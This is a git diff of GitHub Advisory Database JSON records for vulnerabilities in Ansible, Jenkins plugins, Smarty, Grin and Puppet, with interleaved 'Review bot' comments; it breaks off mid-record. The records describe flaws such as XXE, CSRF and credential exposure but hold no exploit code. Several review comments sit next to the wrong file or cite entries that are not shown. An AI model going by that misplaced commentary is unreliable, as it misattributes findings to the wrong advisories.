@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6667-f46p-pg88", + "modified": "2024-01-31T00:03:35Z", + "published": "2022-05-17T19:57:32Z", + "aliases": [ + "CVE-2014-4659" + ], + "summary": "Ansible sets unsafe permissions for sources.list", + "details": "Ansible before 1.5.5 sets 0644 permissions for `sources.list`, which might allow local users to obtain sensitive credential information in opportunistic circumstances by reading a file that uses the `"deb http://user:pass@server:port/"` format.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ansible" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.5.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-4659" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/commit/a0e027fe362fbc209dbeff2f72d6e95f39885c69" + }, + { + "type": "WEB", + "url": "https://github.com/ansible/ansible/blob/release1.5.5/CHANGELOG.md" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20200229060001/https://www.securityfocus.com/bid/68234" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-522" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T00:03:35Z", + "nvd_published_at": "2020-02-20T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json b/advisories/github-reviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json new file mode 100644 index 0000000000000..a86ce0ba5b5c9 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-687x-269m-7cv9/GHSA-687x-269m-7cv9.json 
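Review bot: As written here, the `details` string contains unescaped double quotes inside the backticked fragment `"deb http://user:pass@server:port/"`, which terminates the JSON string early and makes the whole file unparseable; compare GHSA-64cw-m57j-65xj in the same commit, where embedded quotes are written as `\"`. The two inner quotes need to be escaped as `\"deb http://user:pass@server:port/\"` (or dropped, since the backticks already delimit the fragment). Running the file through a strict parser such as `python -m json.tool` before merging would catch this.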
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-687x-269m-7cv9", + "modified": "2024-01-30T22:36:26Z", + "published": "2022-05-14T03:46:09Z", + "aliases": [ + "CVE-2018-1000008" + ], + "summary": "XXE vulnerability in Jenkins PMD Plugin", + "details": "Jenkins PMD Plugin 3.49 and earlier processes XML external entities in files it parses as part of the build process, allowing attackers with user permissions in Jenkins to extract secrets from the Jenkins master, perform server-side request forgery, or denial-of-service attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jvnet.hudson.plugins:pmd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.50" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 3.49" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000008" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2018-01-22/" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/102844" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-611" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:36:26Z", + "nvd_published_at": "2018-01-23T14:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json b/advisories/github-reviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json new file mode 100644 index 0000000000000..783d5aab96e83 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6h72-m3xw-fp3c/GHSA-6h72-m3xw-fp3c.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6h72-m3xw-fp3c", + "modified": "2024-01-30T22:44:21Z", + "published": "2022-05-13T01:40:56Z", + "aliases": [ + "CVE-2017-1000104" + ], + "summary": "Improper Privilege Management in Jenkins Config File Provider Plugin", + "details": "The Config File Provider Plugin is used to centrally manage configuration files that often include secrets, such as passwords. Users with only Overall/Read access to Jenkins were able to access URLs directly that allowed viewing these files. Access to view these files now requires sufficient permissions to configure the provided files, view the configuration of the folder in which the configuration files are defined, or have Job/Configure permissions to a job able to use these files.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:config-file-provider" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.16.2" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 2.16.1" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-1000104" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2017-08-07/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:44:21Z", + "nvd_published_at": "2017-10-05T01:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json b/advisories/github-reviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json new file mode 100644 index 0000000000000..19ae5f17415bb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6j5j-w6v4-rwqr/GHSA-6j5j-w6v4-rwqr.json 
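Review bot: `cwe_ids` is set to `CWE-269` (Improper Privilege Management), but the `details` text describes users with only Overall/Read being able to reach URLs that should have required a permission check, which is the missing-authorization pattern the sibling Jenkins entries in this commit (GHSA-6pj9-5q6j-j97c, GHSA-745w-v492-4fj5, GHSA-74c2-965q-mqjw, GHSA-7mvg-cx9c-r6jm) classify as `CWE-862`. Consider `"cwe_ids": ["CWE-862"]`, or listing both, so that consumers aggregating by CWE get a consistent classification for the same bug class; I cannot tell from the hunk alone which mapping the reviewer intended.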
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6j5j-w6v4-rwqr", + "modified": "2024-01-30T21:43:14Z", + "published": "2022-05-13T01:25:43Z", + "aliases": [ + "CVE-2019-1003078" + ], + "summary": "Jenkins VMware Lab Manager Slaves Plugin vulnerable CSRF vulnerability", + "details": "A cross-site request forgery vulnerability in Jenkins VMware Lab Manager Slaves Plugin in the LabManager.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:labmanager" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.2.8" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003078" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-979" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:43:14Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json b/advisories/github-reviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json new file mode 100644 index 0000000000000..e2a1f92fa4806 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6m9f-8vwq-97pm/GHSA-6m9f-8vwq-97pm.json 
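Review bot: The `summary` string "Jenkins VMware Lab Manager Slaves Plugin vulnerable CSRF vulnerability" is ungrammatical and reads as a copy/paste slip; since `summary` is what most tooling shows as the headline, it should be `"summary": "Jenkins VMware Lab Manager Slaves Plugin vulnerable to CSRF"` or the same "CSRF vulnerability in Jenkins … Plugin" form used by GHSA-6mgq-vh7r-gccc in this commit. The `last_affected: 0.2.8` event with no `fixed` event is consistent with the advisory offering no fixed release, so that part looks right.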
@@ -0,0 +1,58 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m9f-8vwq-97pm", + "modified": "2024-02-08T22:08:36Z", + "published": "2022-05-02T04:00:47Z", + "aliases": [ + "CVE-2009-5054" + ], + "summary": "Smarty Does Not Consider Umask Values When Setting Permissions", + "details": "Smarty before 3.0.0 beta 4 does not consider the umask value when setting the permissions of files, which might allow attackers to bypass intended access restrictions via standard filesystem operations.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "smarty/smarty" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.0.0-beta4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2009-5054" + }, + { + "type": "PACKAGE", + "url": "https://github.com/smarty-php/smarty" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20101116174040/http://smarty-php.googlecode.com/svn/trunk/distribution/change_log.txt" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-281" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T22:08:36Z", + "nvd_published_at": "2011-02-03T17:00:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json b/advisories/github-reviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json new file mode 100644 index 0000000000000..99d34c318bfeb --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6mgq-vh7r-gccc/GHSA-6mgq-vh7r-gccc.json 
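Review bot: The OSV `severity` array is empty while `database_specific.severity` asserts `MODERATE`, so there is no CVSS vector backing the rating and consumers that read the standard `severity` field (rather than the GitHub-specific one) see no score at all; GHSA-7gfc-2v6g-6w9f later in this commit has the same gap. If a vector can be justified from the description (a local umask/permissions issue), add a `{"type": "CVSS_V3", "score": "<vector>"}` entry; otherwise the basis for MODERATE should at least be stated in the PR so the two fields are not silently inconsistent. The `fixed: 3.0.0-beta4` event matches the "before 3.0.0 beta 4" wording and is a form Composer normalizes, so the range itself looks fine.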
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6mgq-vh7r-gccc", + "modified": "2024-01-30T21:41:28Z", + "published": "2022-05-13T01:25:42Z", + "aliases": [ + "CVE-2019-1003086" + ], + "summary": "CSRF vulnerability in Jenkins sinatra-chef-builder Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins Chef Sinatra Plugin in the ChefBuilderConfiguration.DescriptorImpl#doTestConnection form validation method allows attackers to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:sinatra-chef-builder" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.20" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003086" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-1037" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:41:28Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json b/advisories/github-reviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json new file mode 100644 index 0000000000000..f2132fd6c3795 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6pj9-5q6j-j97c/GHSA-6pj9-5q6j-j97c.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6pj9-5q6j-j97c", + "modified": "2024-01-30T21:50:39Z", + "published": "2022-05-13T01:25:16Z", + "aliases": [ + "CVE-2019-1003083" + ], + "summary": "Missing permission check in Jenkins Gearman Plugin", + "details": "A missing permission check in Jenkins Gearman Plugin in the GearmanPluginConfig#doTestConnection form validation method allows attackers with Overall/Read permission to initiate a connection to an attacker-specified server.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:gearman-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.4.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1003083" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-04-03/#SECURITY-991" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/04/12/2" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/107790" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:50:39Z", + "nvd_published_at": "2019-04-04T16:29:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json b/advisories/github-reviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json new file mode 100644 index 0000000000000..d6a0d95360bfc --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6q4p-jrjv-44gf/GHSA-6q4p-jrjv-44gf.json 
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6q4p-jrjv-44gf", + "modified": "2024-01-30T23:18:52Z", + "published": "2022-05-24T16:52:46Z", + "aliases": [ + "CVE-2019-10386" + ], + "summary": "Cross-site request forgery vulnerability in Jenkins XL TestView Plugin", + "details": "A cross-site request forgery vulnerability in Jenkins XL TestView Plugin 1.2.0 and earlier in XLTestView.XLTestDescriptor#doTestConnection allows users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "com.xebialabs.xlt.ci:xltestview-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10386" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-08-07/#SECURITY-1008" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/08/07/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:18:52Z", + "nvd_published_at": "2019-08-07T15:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json b/advisories/github-reviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json new file mode 100644 index 0000000000000..7f6e28fd27f06 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-6x52-88cq-55q5/GHSA-6x52-88cq-55q5.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6x52-88cq-55q5", + "modified": "2024-02-01T21:47:46Z", + "published": "2022-05-24T17:17:13Z", + "aliases": [ + "CVE-2020-12439" + ], + "summary": "Grin allows attackers to adversely affect availability of data on a Mimblewimble blockchain", + "details": "Grin before 3.1.0 allows attackers to adversely affect availability of data on a Mimblewimble blockchain.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "crates.io", + "name": "grin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.1.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-12439" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/issues/3235" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin/pull/3236" + }, + { + "type": "WEB", + "url": "https://github.com/mimblewimble/grin-security/blob/master/CVEs/CVE-2020-12439.md" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T21:47:46Z", + "nvd_published_at": "2020-05-05T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json b/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json index fe6d12c1bed28..b96860f86f446 100644 --- a/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json +++ b/advisories/github-reviewed/2022/05/GHSA-6xxq-j39w-g3f6/GHSA-6xxq-j39w-g3f6.json 
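Review bot: `cwe_ids` is left as an empty array here, and the same is true for GHSA-7f6w-fhmr-j8hq below; both records are marked `github_reviewed: true`, so an empty classification reads as a deliberate "no weakness known" rather than "not yet filled in". For the Jenkins HttpOnly entry, `"cwe_ids": ["CWE-1004"]` (Sensitive Cookie Without 'HttpOnly' Flag) is the standard mapping for exactly the behaviour its `details` describe. For this Grin entry the description says only that data availability is affected, so the CWE should be taken from the linked grin-security write-up rather than guessed; if the maintainers genuinely cannot classify it, a note to that effect in the PR would stop the empty list looking like an omission.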
@@ -68,10 +68,6 @@
 "type": "WEB",
 "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/74796"
 },
- {
- "type": "ADVISORY",
- "url": "https://github.com/advisories/GHSA-6xxq-j39w-g3f6"
- },
 {
 "type": "PACKAGE",
 "url": "https://github.com/puppetlabs/puppet"
@@ -104,6 +100,26 @@
 "type": "WEB",
 "url": "https://web.archive.org/web/20121013181707/http://puppetlabs.com/security/cve/cve-2012-1988/"
 },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20121025112409/http://secunia.com/advisories/48789"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20121025113446/http://secunia.com/advisories/48748"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20121025194830/http://secunia.com/advisories/49136"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20121025194938/http://secunia.com/advisories/48743"
+ },
+ {
+ "type": "WEB",
+ "url": "https://web.archive.org/web/20121031092646/http://www.securityfocus.com/bid/52975"
+ },
 {
 "type": "WEB",
 "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-April/079227.html"
@@ -116,6 +132,18 @@
 "type": "WEB",
 "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080003.html"
 },
+ {
+ "type": "WEB",
+ "url": "http://projects.puppetlabs.com/issues/13518"
+ },
+ {
+ "type": "WEB",
+ "url": "http://projects.puppetlabs.com/projects/1/wiki/Release_Notes#2.6.15"
+ },
+ {
+ "type": "WEB",
+ "url": "http://puppetlabs.com/security/cve/cve-2012-1988/"
+ },
 {
 "type": "WEB",
 "url": "http://ubuntu.com/usn/usn-1419-1"
@@ -127,7 +155,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-77"
+ "CWE-77",
+ "CWE-78"
 ],
 "severity": "MODERATE",
 "github_reviewed": true,
diff --git a/advisories/github-reviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json b/advisories/github-reviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json
new file mode 100644
index 0000000000000..a8372d2500367
--- /dev/null
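Review bot: The third hunk (`@@ -116,6 +132,18 @@`) adds `http://puppetlabs.com/security/cve/cve-2012-1988/`, which is the same resource as the `https://web.archive.org/web/20121013181707/http://puppetlabs.com/security/cve/cve-2012-1988/` entry already visible as context in the second hunk, so the list now carries the page twice, once as an unarchived plain-HTTP URL. The two `projects.puppetlabs.com` links added alongside it are also plain-HTTP and, as far as I know, that host no longer serves the old Redmine tracker; the secunia/securityfocus entries added in the same file use archive snapshots and these should follow suit, e.g. `"url": "https://web.archive.org/web/<snapshot-timestamp>/http://projects.puppetlabs.com/issues/13518"`. Dropping the self-referencing `ADVISORY` link in the first hunk and adding `CWE-78` next to `CWE-77` in the last one both look correct.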
+++ b/advisories/github-reviewed/2022/05/GHSA-745w-v492-4fj5/GHSA-745w-v492-4fj5.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-745w-v492-4fj5", + "modified": "2024-01-30T21:24:33Z", + "published": "2022-05-24T16:50:04Z", + "aliases": [ + "CVE-2019-10342" + ], + "summary": "Missing permission check in Jenkins Docker Plugin", + "details": "A missing permission check in Jenkins Docker Plugin 1.1.6 and earlier in various 'fillCredentialsIdItems' methods allowed users with Overall/Read access to enumerate credentials ID of credentials stored in Jenkins.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.jenkins.docker:docker-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.1.7" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.1.6" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10342" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1400" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/07/11/4" + }, + { + "type": "WEB", + "url": "http://www.securityfocus.com/bid/109156" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:24:33Z", + "nvd_published_at": "2019-07-11T14:15:00Z" + } +} \ No newline at end of file 
diff --git a/advisories/unreviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json b/advisories/github-reviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json
similarity index 75%
rename from advisories/unreviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json
rename to advisories/github-reviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json
index 00305c6573b90..a6f0f1c2c9415 100644
--- a/advisories/unreviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json
+++ b/advisories/github-reviewed/2022/05/GHSA-746x-xxrx-23jp/GHSA-746x-xxrx-23jp.json
@@ -1,11 +1,12 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-746x-xxrx-23jp",
- "modified": "2022-05-13T01:15:02Z",
+ "modified": "2024-01-30T21:51:21Z",
 "published": "2022-05-13T01:15:02Z",
 "aliases": [
 "CVE-2019-10294"
 ],
+ "summary": "Jenkins Kmap Plugin stores credentials in plain text ",
 "details": "Jenkins Kmap Plugin stores credentials unencrypted in job config.xml files on the Jenkins master where they can be viewed by users with Extended Read permission, or access to the master file system.",
 "severity": [
 {
@@ -14,7 +15,15 @@
 }
 ],
 "affected": [
-
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:kmap-jenkins"
+ },
+ "versions": [
+ "1.6"
+ ]
+ }
 ],
 "references": [
 {
@@ -39,8 +48,8 @@
 "CWE-522"
 ],
 "severity": "HIGH",
- "github_reviewed": false,
- "github_reviewed_at": null,
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T21:51:21Z",
 "nvd_published_at": "2019-04-04T16:29:00Z"
 }
 }
\ No newline at end of file
diff --git a/advisories/github-reviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json b/advisories/github-reviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json
new file mode 100644
index 0000000000000..6d969f23692d6
--- /dev/null
+++ b/advisories/github-reviewed/2022/05/GHSA-74c2-965q-mqjw/GHSA-74c2-965q-mqjw.json
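Review bot: The new `summary` value ends with a trailing space (`"…stores credentials in plain text "`), which will show up in every headline rendering and in any exact-match dedup against NVD/CVE titles; the same trailing space is in the `summary` of GHSA-74c2-965q-mqjw in the next file. Trim both, e.g. `"summary": "Jenkins Kmap Plugin stores credentials in plain text",`. In the second hunk the package is given as an explicit `"versions": ["1.6"]` list with no range, so only a dependency on exactly 1.6 will ever match; the `details` text does not bound the affected versions, so if earlier releases carry the same plaintext storage (which I cannot confirm from this page) a range with `introduced: 0` and `last_affected: 1.6` would be the more accurate encoding.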
@@ -0,0 +1,61 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-74c2-965q-mqjw", + "modified": "2024-01-30T21:15:46Z", + "published": "2022-05-24T16:58:50Z", + "aliases": [ + "CVE-2019-10457" + ], + "summary": "Missing permission check in Jenkins Oracle Cloud Infrastructure Compute Classic Plugin ", + "details": "A missing permission check in Jenkins Oracle Cloud Infrastructure Compute Classic Plugin allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:oracle-cloud-infrastructure-compute-classic" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.0.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10457" + }, + { + "type": "WEB", + "url": "https://jenkins.io/security/advisory/2019-10-16/#SECURITY-1462" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2019/10/16/6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:15:46Z", + "nvd_published_at": "2019-10-16T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json b/advisories/github-reviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json new file mode 100644 index 0000000000000..1611cfcd24685 --- /dev/null +++ b/advisories/github-reviewed/2022/05/GHSA-7577-f8fp-5977/GHSA-7577-f8fp-5977.json 
@@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7577-f8fp-5977", + "modified": "2024-01-30T22:12:23Z", + "published": "2022-05-14T02:57:57Z", + "aliases": [ + "CVE-2018-1999029" + ], + "summary": "Stored Cross-Site Scripting Vulnerability in Jenkins Shelve Project Plugin", + "details": "A cross-site scripting vulnerability exists in Jenkins Shelve Project Plugin 1.5 and earlier in ShelveProjectAction/index.jelly, ShelvedProjectsAction/index.jelly that allows attackers with Job/Configure permission to define JavaScript that would be executed in another user's browser when that other user performs some UI actions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:shelve-project-plugin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.0" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 1.5" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999029" + }, + { + "type": "WEB", + "url": 